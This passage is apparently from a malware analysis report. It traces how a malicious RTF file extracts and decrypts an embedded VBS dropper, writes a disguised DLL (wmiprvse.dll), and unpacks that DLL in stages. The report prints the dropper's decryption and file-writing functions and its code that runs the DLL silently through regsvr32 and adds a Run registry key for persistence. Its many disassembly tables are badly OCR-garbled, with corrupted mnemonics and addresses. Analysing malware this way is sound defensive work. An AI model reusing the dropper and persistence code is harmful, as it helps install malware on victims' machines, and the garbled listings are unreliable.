In the following code it searches for the embedded VBS file inside the RTF file in memory. It checks for the file size in a loop, and if the size is larger than 0x2000 then it sets the file ponter to 0x8C14 to compare with the VBS file marker as we can see in following screenshot.

| 00200101  |          | 60.01            | DUCH 4                                |                         |
|-----------|----------|------------------|---------------------------------------|-------------------------|
| 02620121  |          | OH OT            |                                       |                         |
| 02E20123  |          | *5E              | PUP EST                               |                         |
| 02E20124  |          | 8D45 F4          | LEA EAX, DWORD PIR SS:LEBP-CI         |                         |
| 02E20127  |          | 50               | PUSH EAX                              |                         |
| 02E20128  |          | 56               | PUSH ESI                              |                         |
| 02E20129  |          | 8B07             | MOU EAX, DWORD PTR DS:[EDI]           | kerne132.GetFileSize    |
| 02E2012B  |          | FFDØ             | CALL EAX                              |                         |
| 02F2012D  |          | 8945 FO          | MOU DUORD PTR SS: [FBP-10] FAX        |                         |
| 02520130  |          | 83F8 FF          | CMP FOX -1                            |                         |
| 02120130  |          | 7E 04            | TN7 CUADT 09590120                    |                         |
| 02120133  | ~        | 73 UT<br>AC      | INC TO I                              |                         |
| 02520133  |          | 40               | THE LOI                               |                         |
| 02520130  |          | 30<br>FD FA      | IND CHODT COLOCION                    |                         |
| 02E20137  | <u> </u> | EB EH            | JUL 2001 23                           |                         |
| 02E20139  |          | 3D 00500000      | CMP ERX, 2000                         |                         |
| 02E2013E  | $\sim$   | 77 04            | JA SHORT 02E20144                     |                         |
| 02E20140  |          | 46               | INC ESI                               |                         |
| 02E20141  |          | 56               | PUSH ESI                              |                         |
| 02E20142  | ^        | EB DF            | JMP SHORT 02E20123                    |                         |
| 02E20144  |          | 6A 00            | PUSH 0                                |                         |
| 02E20146  |          | 68 00            | PUSH Ø                                |                         |
| 02F20148  |          | 68 1480000       | PUSH 8C14                             |                         |
| 02F2014D  |          | 56               | PUSH FSI                              |                         |
| 02E2014E  |          | 9847 04          | MOUL FAY DUORD PTR DC · [EDI+4]       | kewnel32 SetEilePointew |
| 02E2014E  |          | EEDQ             | COLL EAV                              | Kerneijz.setriierointer |
| 02620151  |          |                  |                                       |                         |
| 02E20153  |          | 6H 00            | FUSH 0                                |                         |
| 02E20155  |          | 8045 EC          | LEH EHX, DWORD PIR SS: LEBP-141       |                         |
| 02E20158  |          | 50               | PUSH EAX                              |                         |
| 02E20159  |          | 6A Ø8            | PUSH 8                                |                         |
| 02E2015B  |          | 8D45 B8          | LEA EAX, DWORD PTR SS:[EBP-48]        |                         |
| 02E2015E  |          | 50               | PUSH EAX                              |                         |
| 02E2015F  |          | 56               | PUSH ESI                              |                         |
| 02E20160  |          | 8B47 Ø8          | MOU EAX.DWORD PTR DS:[EDI+8]          | kerne132.ReadFile       |
| 02E20163  |          | FFDA             | CALL EAX                              |                         |
| 02E20165  |          | 8500             | TEST EAX EAX                          |                         |
| 02F20167  |          | 75 04            | JNZ SHORT 02F2016D                    |                         |
| 02020107  | ×.       | AC               | INC TOI                               |                         |
| 02E20107  |          | 56               |                                       |                         |
| 02E2010H  | ~        |                  | IND PUODT ADEDA(00                    |                         |
| 02520168  |          |                  | JAT SHUKI UZEZUIZJ                    |                         |
| UZEZU16D  |          | 8170 88 50645044 | CMP DWORD PIR 55: LEBP-48 J, 44506450 |                         |
| 02E20174  | $\sim$   | 74 04            | JE SHORT UZEZU17A VDS                 | file start blanken      |
| 02E20176  |          | 46               | INC ESI TO TO T                       | ne start marker         |
| 02E20177  |          | 56               | PUSH ESI                              |                         |
| 02E20178  | ^        | EB A9            | JMP SHORT 02E20123                    |                         |
| 02E2017A  |          | 817D BC EFFEEAAE | CMP DWORD PTR SS:[EBP-44] AEEAFEEF    |                         |
| 02E20181  | ~        | 74 04            | JE SHORT 02E20187                     |                         |
| 02E20183  |          | 46               | INC ESI                               |                         |
| 02E20184  |          | 56               | PUSH EST                              |                         |
| 02F20185  | ~        | FB 9C            | JMP SHORT 02F20123                    |                         |
| OPPEROTOR |          | LD 70            | OIL OIVIL GALAGIAS                    |                         |

After finding the VBS marker in memory, it decrypts the VBS file in two iterations. In the first loop it decrypts and in the second loop it swaps the low and high bytes of the first 0x100 16-bit words, after which it writes the file to a file named "Temp/ew\_Rg.vbs".

| 02E201EC | Ø345 E8                                | ADD EAX. DWORD PTR SS: [EBP-18]               |                               |
|----------|----------------------------------------|-----------------------------------------------|-------------------------------|
| 02E201EE | 8945 DC                                | MOU DUORD PTR SS:[FRP-241 FAX                 |                               |
| 02220121 | 40                                     | DEC EQU                                       |                               |
| UZEZUIFZ | 10                                     | DEG ENA<br>MAU DI DUTE DID DO FEDU FAU (00001 |                               |
| 02E201F3 | 887403 30800000                        | MOU DL, BYTE PIR DS:LEBX+EHX+8C301            | day laws                      |
| 02E201FA | 32DØ                                   | XOR DL,AL DECTY                               | raan Laap                     |
| 02E201FC | 889403 308C0000                        | MOU BYTE PTR DS:[EBX+EAX+8C30].DL             |                               |
| 02F20203 | 8500                                   | TEST FAX FAX                                  |                               |
| 02220202 | ^ 77 FD                                | TO CHORT GOEOGIED                             |                               |
| 02520203 | ODOE DOPERTER                          | LEA EAN DUODD DTD CC. LEDD 4401               |                               |
| 02520207 | 0D00 D0LELLL                           | DUCH EHA, DWORD FIN 33-LEDF-1401              |                               |
| 02E2020D | 50                                     | PUSH EHA                                      |                               |
| 02E2020E | 22 22 22 22 22 22 22 22 22 22 22 22 22 | PUSH 0F8                                      |                               |
| 02E20213 | FF57 14                                | CALL DWORD PTR DS:[EDI+14]                    | kerne132.GetTempPathA         |
| 02E20216 | 8DBB 308C0000                          | LEA EDI, DWORD PTR DS:[EBX+8C30]              |                               |
| 02E2021C | 83C9 FF                                | OR ECX.FFFFFFFF                               |                               |
| 02F2021F | 3300                                   | YOR FOX FOX                                   |                               |
| 02520211 | E2 • 0E                                | DEDNE COAC DUTE DTD EC.[EDI]                  |                               |
| 04640441 | F6.8E                                  | NETHE SONS BILL FIN ESSLEDIJ                  |                               |
| 02220223 | F7D1                                   | NUL EGA                                       |                               |
| 02E20225 | 2BF9                                   | SUB EDI,ECX                                   |                               |
| 02E20227 | 8BF7                                   | MOV ESI,EDI                                   |                               |
| 02E20229 | 8BD1                                   | MOU EDX.ECX                                   |                               |
| 02F2022B | 8DBD B8FEFFFF                          | LEA EDI DUORD PTR SS: [EBP-148]               |                               |
| 02520221 | 83C9 FF                                | OR ECY FEFEFEE                                |                               |
| 02520231 | E2 • AE                                | DEDNE COAC DUTE DTD EC.[EDI]                  |                               |
| 02620234 | FZ-HE                                  | NETME SCHS BYLE FIN ESSLEDIJ                  |                               |
| UZEZUZ36 | 4F                                     | DEC EDI                                       |                               |
| 02E20237 | 8 BCA                                  | MOU ECX,EDX                                   |                               |
| 02E20239 | F3:A4                                  | REP MOUS BYTE PTR ES:[EDI], BYTE PTR DS:[ES   | 11                            |
| 02E2023B | 6A 02                                  | PUSH 2                                        |                               |
| 02E2023D | 8D85 B8FEFFFF                          | LEA EAX, DWORD PTR SS: [EBP-148]              |                               |
| 02F20243 | 50                                     | PIICH FOX                                     | Create and Dauka file in Tama |
| 02120213 | 000 CC                                 | MOU EDI DUODD DID CC.[EDD_4]                  | Greate ew_itg.vos me in remp  |
| 04640644 | 0D7D FG<br>EEFE 40                     | COLL DUODD DTD DC. [EDI.40]                   | 1                             |
| 02120247 | FF57 18                                | CHILL DWORD FIR DS:LEDI+181                   | kernel32lcreat                |
| 02E2024H | 83F8_FF                                | CMP EHX,-1                                    |                               |
| 02E2024D | √ 75 Ø5                                | JNZ SHORT 02E20254                            |                               |
| 02E2024F | V E9 89010000                          | JMP 02E203DD                                  |                               |
| 02E20254 | 8945 C8                                | MOU DWORD PTR SS:[EBP-38].EAX                 |                               |
| 02F20257 | 8 BDØ                                  | MOU EDX FAX                                   |                               |
| 02F20259 | FF75 F8                                | PUSH DUORD PTR SS [FRP-18]                    |                               |
| 02520257 | 0102 20000000                          | LEO EON DUODD DID DC . LEDY 400001            |                               |
| 02E20230 | 0702 20000000<br>0702 20000000         | ADD EAN DUADD DTD CC. [EDD -90]               |                               |
| UZEZUZ6Z | 0345 E0                                | HUD EHA, DWORD FIR 55:LEBP-201                |                               |
| 02E20265 | 50                                     | PUSH ERX                                      |                               |
| 02E20266 | 52                                     | PUSH EDX                                      |                               |
| 02E20267 | B9 00010000                            | MOU ECX,100                                   |                               |
| 02E2026C | 8A5448 FE                              | MOU DL, BYTE PTR DS: [EAX+ECX*2-2]            |                               |
| 02E20270 | 8A7448 FF                              | MOU DH. BYTE PTR DS: [EAX+ECX+2-1] Swaps by   | tes within a word             |
| 02F20274 | 887448 FF                              | MOU BYTE PTR DS: [EAX+ECX*2-21.DH             |                               |
| 02520279 | 885448 FF                              | MOU BUTE PTR DC - FEAY + FCY +2-11 DL         | Write to ew Ra vhs file       |
| 02520270 | ~ E9 EE                                | LOODD CHODT GODOGCC                           |                               |
| OZEZOZ7G | EZ EE<br>BBED 40                       | COLL DUODD DTD DC. LEDI. 401                  | 1                             |
| UZEZUZ7E | FF57 16                                | CHEL DWORD PIK DS:LEDI+IGI                    | kernel321Write                |
| 02E20281 | FF75 C8                                | PUSH DWORD PIR SS: LEBP-381                   |                               |
| 02E20284 | FF57 10                                | CALL DWORD PTR DS:[EDI+10]                    | kerne132.CloseHandle          |

#### Payload .VBS file Analysis

The following screenshot shows a part of the .VBS payload file dropped by .RTF file. First line is the encrypted .dll 4<sup>th</sup> line contains Key to decrypt the .dll. Remaining part is self-explanatory.

```
c="jxixo`heaiccbcdablhbhfgdl{~lfbdawl`hfhhea`bdfdbdhfahgea`fga`dhebc`b``fghbehfhhbbfhh`gfdegf` Encrypted DLL
regsxr=""
b="C1129DE3E96440962AA7A5DC1D6B4CAB6A9F2AB4E885842E0E466A9DF99B1DC74A3D2A2061F110E516E9AD41207 Encrypted blob
k="6457608516332341288226746586624154086885102464244618751067104852302006782586882268807" Key to decrypt DLL
n="wniprvse.dll" Dropped DLL name
nn="munnopsis" Binary blob name
v="pemangkat" Run key
```

The instruction c = Crypt(c,k) function decrypts the encrypted dll and returns the decrypted dll. (See the screenshot above)

c= encrypted dll.

k = decryption key.

```
Function Crypt( Str, Key )
ReDim RetStr(Len(Str))
Pos = 1
For x = 1 To Len(Str)
RetStr(x) = Chr( Asc(Mid(Str,x,1)) - Asc(Mid(Key,Pos,1)) )
Pos = Pos + 1
If Pos > Len(Key) Then Pos = 1
Next
Crypt = Join(RetStr,"")
End Function
```

Following function writes byte by byte to the dropped.dll file.

```
Function WB(FN, Buf,sz)
With fso.OpenTextFile(FN, 2, True)
For x = 1 To sz Step 2
.Write Chr(Clng("&h" & Mid(Buf,x,2)))
Next
.Close
End With
End Function
```

Finally, the following code executes the "regsvr32" command to run the wmiprvse.dll in silent mode and sets the run key in registry.

```
For Each a in p
   t = fso.BuildPath( WshShell.ExpandEnvironmentStrings(a), n)
   l = fso.BuildPath(WshShell.ExpandEnvironmentStrings(a), nn)
   WB 1, b, Len(b)
   WB t, c, Len(c)
    If( fso.FileExists(l) and fso.FileExists(t) ) Then
                                                               'C:\WINDOWS\wmiprvse.dll -> Checks the file exists or not
       st = regsvr+Chr(34)+t+Chr(34)+" /s"
        If WshShell.Run(st, 0, false) = 0 Then
                                                               'regsvr32 "C:\WINDOWS\wmiprvse.dll" /s -> runs this command if file exist
           objReg.SetExpandedStringValue HCU,regkey,v,st
                                                               'Sets Run Entry
           Exit For
        End If
    End If
Next
```

## Payload "wmiprvse.dll" file Analysis

This first level of deobfuscation in wmiprvse.dll takes around 3-4 minutes to finish. Then it allocates memory using VirtualAlloc and writes the unpacked code to newly allocated memory before it jumps to the unpacked code as shown in following screen shot.

| 100E000C mov<br>100E0012 movsx<br>100E0012 povsx                                        | ecx, [ebp+var_1B4]<br>edx, [ebp+ecx+var_2B0]<br>edx ; int                                                                                                    | Image: Second state         Image: Second state           100E0047         100E0047           100E0047 loc_100E0047:         ; flProtect           100E0047 push         40h                                                                                                    |                                                                                                    |
|-----------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| 100E0018 call<br>100E0020 add<br>100E0023 test<br>100E0023 jz                           | sp, 4<br>esp, 4<br>eax, eax<br>short loc_100E0045                                                                                                    | 1006.0049       push       1038000       ; filliocationigpe         1006.0049       mov       eax, [ebp+var_190]       10060050         1006.0058       mov       ecx, [eax+50h]       idwSize         1006.0058       push       ecx       ; dwSize         1006.0058       push       0       ; lpAddress         1006.0058       out       [ebp+ipAddress], eax       10062066         1006.0060       [ebp+ipAddress], eax       10062066       [ebp+ipAddress], 0         100620666       [cbp-ipAddress], 0       100620540       [ebp+ipAddress], 0 | 100E041F           100E041F           100E041F           100E041F           100E041F           100E041F           100E0425           100E0425           100E0425           100E0426           100E0426           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428           00E0428              |
| EN LL<br>100E0027 mov<br>100E002D mov5x<br>100E0035 add<br>100E0038 mov<br>100E0038 mov | eax, [ebp+var_1E4]         160E 6073 mov         edx, [ebp+lpAddi           ecx, [ebp+var_1E4]         160E 6074 push         edx           ecx, [at 160E 6077 push         edx         edx           edx, [ebp+var_184]         160E 6076 push         eds           [ebp+edx+var_286]         160E 6076 mov         eax, [ebp+var_30           [ebp+edx+var_286]         160E 6086 movzx         ecx, [ebp+var_31           160E 6086 movzx         edx, [ebp+var_164         160E 6086 movzx           160E 6086 movzx         edx, [ebp+var_164           160E 6089 push         ecx         ecx           160E 6089 novzx         edx, [ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6089 novzx         edx         ebp+var_164           160E 6097 add         esp_144         esp_144 | ss]<br>int<br>uBytes<br>J<br>int<br>J<br>int<br>j<br>int                                                                                                    | 100E0431 push eax<br>100E0432 lea ecx, [ebp+var_380]<br>100E0432 lea ecx, [ebp+var_380]<br>100E0439 call sub_1000C9E0<br>100E043E add esp, 10h<br>100E0441 nov eax, [ebp+var_388]<br>100E044D push 0<br>100E044D push 0<br>100E044D push 1<br>100E044F push 1<br>100E044F push 1<br>100E044F push 1<br>100E045T call eax<br>100E0457 push [ebp+lpAddress]<br>100E0457 push [ebp+var_388], 0<br>100E0463 push loc_100E0474 |

This dll has 3 layers of unpacking. The one above is level one, below iyou can see level two. We can see the passing of the control to the newly unpacked .dll @CALL EAX.

| C File View Debug Plugins Options Window Help |                                   |                                                                                                    |                                                                                  |     |      |  |  |  |  |
|-----------------------------------------------|-----------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------|-----|------|--|--|--|--|
|                                               |                                   |                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FB8F                                      | ~ EB 66                           | JMP SHORT 7FF7FBF7                                                                                                    | Registers (FPU)                                                                  | <   | <    |  |  |  |  |
| 7FF7FB91<br>7FF7FB97                          | 8875 64F7FFFF<br>52               | MOV EDX, DWORD FIR 55:LEBP-6901<br>PUSH FDX                                                                                                    | EAX 7FF44E13                                                                     |     |      |  |  |  |  |
| 7FF7FB98                                      | Ĕ8 93010000                       | CALL 7FF7FD30                                                                                                    | ECX 00000000<br>FDX 00000000                                                     |     |      |  |  |  |  |
| 7FF7FB9D                                      | 83C4 04                           | ADD_ESP,4                                                                                                    | EBX 7FF70000                                                                     |     |      |  |  |  |  |
| 7FF7FBA0                                      | 8500                              | TEST EAX, EAX                                                                                                    | ESP 0007CCE0                                                                     |     |      |  |  |  |  |
| 7FF7FBHZ                                      | ~ 75 40<br>68 00800000            | UNA SHUKI 7FF7FBU4                                                                                                    | EBP 0007D390                                                                     |     |      |  |  |  |  |
| 7FF7FBA9                                      | 6A 00                             | PUSH Ø                                                                                                    | ESI 00000001                                                                     |     |      |  |  |  |  |
| 7FF7FBAB                                      | 8B85 64F9FFFF                     | MOU EAX, DWORD PTR SS:[EBP-69C]                                                                                                    | EDI 0000000                                                                      |     |      |  |  |  |  |
| 7FF7FBB1                                      | 50<br>PD15 14002002               | PUSH EAX                                                                                                    | EIP <b>7FF7FBF5</b>                                                              |     |      |  |  |  |  |
| 7FF7FBB2                                      | C785 64F9FFFF 0000000             | MOIL DWORD PTR DS:[/FF90014]                                                                                                    | C Ø ES 0023 32bit Ø(FFFFFFF)                                                     |     |      |  |  |  |  |
| 7FF7FBC2                                      | ~ EB 33                           | JMP SHORT 7FF7FBF7                                                                                                    | P Ø GS ØØ1B 32bit Ø(FFFFFFFF)<br>A Ø GS ØØ22 22bit Ø(EPEPEPEP)                   |     |      |  |  |  |  |
| 7FF7FBC4                                      | 68 F800000                        | PUSH_0F8                                                                                                    | Z A DS A023 32bit A(FFFFFFF)                                                     |     |      |  |  |  |  |
| 7FF7FBC9                                      | 8B8D 64FEFFFF                     | MOU ECX, DWORD PTR SS:[EBP-19C]                                                                                                    | S 0 FS 003B 32bit 7FFDF000(FFF)                                                  |     |      |  |  |  |  |
| 7FF7FBCF                                      | 51<br>8D95 68F9FFFF               | LEA EDX DUORD PTR SS: [ERP-698]                                                                                                    | T 0 GS 0000 NULL                                                                 |     |      |  |  |  |  |
| 7FF7FBD6                                      | 52                                | PUSH EDX                                                                                                    | D 0 LastEnn EPROP SUCCESS (0000000)                                              |     |      |  |  |  |  |
| 7FF7FBD7                                      | E8_240A0000                       | CALL 7FF80600                                                                                                    | V B LASTEFF ENNON_SUGESS (BODDBODD)                                              |     |      |  |  |  |  |
| 7FF7FBDC                                      | 83C4 ØC                           | ADD ESP, OC                                                                                                    | EFL 00000202 (NU,NB,NE,H,NS,PU,GE,G)                                             |     |      |  |  |  |  |
| 7FF7FBDF<br>7FF7FBF5                          | 8685 70F7FFFF<br>0385 64F9FFFF    | ADD FAX DWORD PTR SS: [FBP-69C]                                                                                                    | STO empty 0.4000519573324871160e-4933                                            |     |      |  |  |  |  |
| 7FF7FBEB                                      | 6A 00                             | PUSH Ø                                                                                                    | ST1 empty -/// FFFF 7C910208 7C90E900<br>ST2 empty -UNORM ERO0 7C9101RB 7C91017B |     |      |  |  |  |  |
| 7FF7FBED                                      | 6A 01                             | PUSH 1                                                                                                    | ST3 empty -UNORM E7C4 0185E80C C0000034                                          |     |      |  |  |  |  |
| 7FF7FBEF                                      | FFB5 64F9FFFF                     | PUSH DWORD PTR SS:[EBP-69C]                                                                                                    | ST4 empty +UNORM 0010 0185E7B4 00000018                                          |     |      |  |  |  |  |
| 7FF7FBF5                                      | 8885 64F9FFFF                     | HOU FAX DUDRD PTR SS: [FRP-69C]                                                                                                    | ST5 empty 0.0                                                                    |     |      |  |  |  |  |
| 7FF7FBFD                                      | 8B4D FC                           | MOU ECX, DWORD PTR SS: [EBP-4]                                                                                                    | SIb empty 0.0<br>STD empty 5 7265722074791921720                                 |     |      |  |  |  |  |
| 7FF7FC00                                      | 33CD                              | XOR ECX, EBP                                                                                                    | 3 2 1 0 E S P U O Z                                                              | DI  |      |  |  |  |  |
| 7FF7FC02                                      | E8 5A0D0000                       | CALL 7FF80961                                                                                                    | FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0                                              | 00  | (LT) |  |  |  |  |
| ZEEZEC09                                      | 5D                                | POP ERP                                                                                                    | FCW 027F Prec NEAR,53 Mask 1 1 1 1                                               | 1 1 |      |  |  |  |  |
| 7FF7FCØA                                      | C2 0400                           | RETN 4                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FCØD                                      | CC                                | INT3                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FC0E<br>7FF7FC0E                          |                                   | INI3<br>INT2                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FC10                                      | 55                                | PUSH EBP                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FC11                                      | 8BEC                              | MOU EBP, ESP                                                                                                    |                                                                                  |     |      |  |  |  |  |
| 7FF7FC13                                      | 83EC 20                           | SUB ESP, 20                                                                                                    | 1                                                                                |     |      |  |  |  |  |
| < III                                         | XRAS MX                           |                                                                                                    |                                                                                  |     |      |  |  |  |  |
|                                               |                                   |                                                                                                    |                                                                                  |     |      |  |  |  |  |
| Hddress                                       |                                   |                                                                                                    | - 0007CCE4 0000001                                                               |     |      |  |  |  |  |
| 7FF30000                                      | 110 3H 70 00 03 00 00 00 04 09 09 |                                                                                                    | 0007CCE8 0000000                                                                 |     |      |  |  |  |  |
| 7FF30020                                      | 00 00 00 00 00 00 00 00 00        |                                                                                                    | 0007CCEC 00000004                                                                |     |      |  |  |  |  |
| 7FF30030                                      | 00 00 00 00 00 00 00 00 00        | 00 00 00 E8 00 00 00                                                                                                    | 000700F0 000A1000                                                                |     |      |  |  |  |  |
| 7FF30040                                      | UE 1F BA UE UU B4 U9 CD 21        | B8 01 4C CD 21 54 68 DV []                                                                                                    | 0007CCF8 00004550                                                                |     |      |  |  |  |  |
| 7FF30060                                      | 74 20 62 65 20 72 75 6F 20        | 69 6E 20 44 4F 53 20 t be run in DOS                                                                                                    | 0007CCFC 0004014C                                                                |     |      |  |  |  |  |
| 7FF30070                                      | 6D 6F 64 65 2E 0D 0D 0A 24        | 00 00 00 00 00 00 00 mode\$                                                                                                    | 0007CD00 471D961E                                                                |     |      |  |  |  |  |
| 7FF30080                                      | 9F 35 73 9D DB 54 1D CE DE        | 54 1D CE DB 54 1D CE 55s¥ T+# T+# T+#                                                                                                    | 00070004 0000000                                                                 |     |      |  |  |  |  |
| 7FF30090                                      | B4 22 83 CE CD 54 1D CE B4        | ZZ = B7 = CE = 47 = 54 = 10 = CE = 10 = T = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 11 = 10 = T = 10 = T = 1 | 0007CD0C 210200E0                                                                |     |      |  |  |  |  |
| 7FF300B0                                      | B4 22 B6 CE EF 54 1D CE B4        | 22 86 CE DA 54 1D CE 1 11:01 12:11 14:1                                                                                                    | 0007CD10 000A010B                                                                |     |      |  |  |  |  |
| 7FF300C0                                      | B4 22 80 CE DA 54 1D CE 52        | 69 63 68 DB 54 1D CE - "CirrT+"Rich T+"                                                                                                    | 0007CD14 00026C00                                                                |     |      |  |  |  |  |
| 7FF300D0                                      | 00 00 00 00 00 00 00 00 00        |                                                                                                    | 0007GD18 0000B400                                                                |     |      |  |  |  |  |
| 7FF300E0                                      |                                   | 45 UU UU 4C 01 04 00PEL9.                                                                                                    | 0007CD20 00014F13                                                                |     |      |  |  |  |  |

It's very time-consuming to understand the functionality of the dll as it decrypts and builds its own runtime import table to hinder the analysis. Analyst cannot directly see which API gets called.

| 7FF44E75                                                                                                    | FF15 6880F57F                                                                                                    | CALL DWORD PTR DS: [7FF58068]                                                                                                    |                                                                                                    |                                                                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| 7FF44E7B                                                                                                    | 8BF8                                                                                                    | MOV EDI, EAX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E7D                                                                                                    | 85FF                                                                                                    | TEST EDI, EDI                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E7F<br>7FF44E91                                                                                                    | ✓ 75 5E<br>2905 200FFF57F                                                                                                    | ONA SHUKI 7FF44EDF<br>CMP DUORD PTP DS-F7PP5CP3C1 Fox                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E87                                                                                                    | 74 40                                                                                                    | JE SHORT 7FF44EC9                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E89                                                                                                    | 56                                                                                                    | PUSH ESI                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E8A                                                                                                    | E8 9C240000                                                                                                    | CALL 7FF4732B                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E8F                                                                                                    | 59                                                                                                    | POP ECX                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44E90                                                                                                    | 8500<br>74 1 D                                                                                                    | IESI EHX, EHX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E94                                                                                                    | 83FE E0                                                                                                    | CMP_ESL20                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E97                                                                                                    | ^ 76 CB                                                                                                    | JBE SHORT 7FF44E64                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E99                                                                                                    | 56                                                                                                    | PUSH ESI                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44E9A                                                                                                    | E8 8C240000                                                                                                    | CALL 7FF4732B                                                                                                    | annonna a                                                                                                    |                                                                                                    |
| 7FF44E9F                                                                                                    | 57<br>EQ 2E100000                                                                                                    |                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44E40                                                                                                    | C700 0C00000                                                                                                    | MOU DUORD PTR DS: [FAX ]_0C                                                                                                    | API Call 📃                                                                                                    |                                                                                                    |
| 7FF44EAB                                                                                                    | 3300                                                                                                    | XOR EAX, EAX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EAD                                                                                                    | 5F                                                                                                    | POP EDI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44EAE                                                                                                    | 5E                                                                                                    | POP ESI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44EAF                                                                                                    | 5D<br>C2                                                                                                    | POP EBP                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44EB0<br>7FF44FR1                                                                                                    | СЗ<br>F8 2D160000                                                                                                    | COLL 2FF468F3                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EB6                                                                                                    | 8BF0                                                                                                    | MOU ESI FAX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EB8                                                                                                    | FF15 4C81F57F                                                                                                    | CALL DWORD PTR DS:[7FF5814C]                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EBE                                                                                                    | 50                                                                                                    | PUSH EAX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EBF                                                                                                    | E8 DD190000                                                                                                    | CALL 7FF468A1                                                                                                    | PERFERENCE                                                                                                    |                                                                                                    |
| 7FF44EC4<br>7FF44EC5                                                                                                    | 57<br>8906                                                                                                    | MOUL DUORD PTR DS: [FS1] FAX                                                                                                    | /FF/FBF/                                                                                                    |                                                                                                    |
| 7FF44EC7                                                                                                    | ^ EB E2                                                                                                    | JMP SHORT 7FF44EAB                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44EC9                                                                                                    | Ē8 151A0000                                                                                                    | CALL 7FF468E3                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44ECE                                                                                                    | 8BF0                                                                                                    | MOU ESI, EAX                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44ED0                                                                                                    | FF15 4C81F57F                                                                                                    | CALL DWORD PTR DS: [7FF5814C]                                                                                                    |                                                                                                    |                                                                                                    |
| TERAAEDC                                                                                                    | L 14                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44FD7                                                                                                    | 50<br>F8 C5190000                                                                                                    | PUSH EAX<br>CALL ZEE46801                                                                                                    |                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC                                                                                                    | 50<br>E8 C5190000<br>59                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD                                                                                                    | 50<br>E8 C5190000<br>59<br>8906                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44EDF<br>7FF44EE1<br>7FF44EE1                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>9BE                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORI 7FF44EAD<br>MOU EDI EDI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EE1<br>7FF44EF3                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT 7FF44EAD<br>MOU EDI EDI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
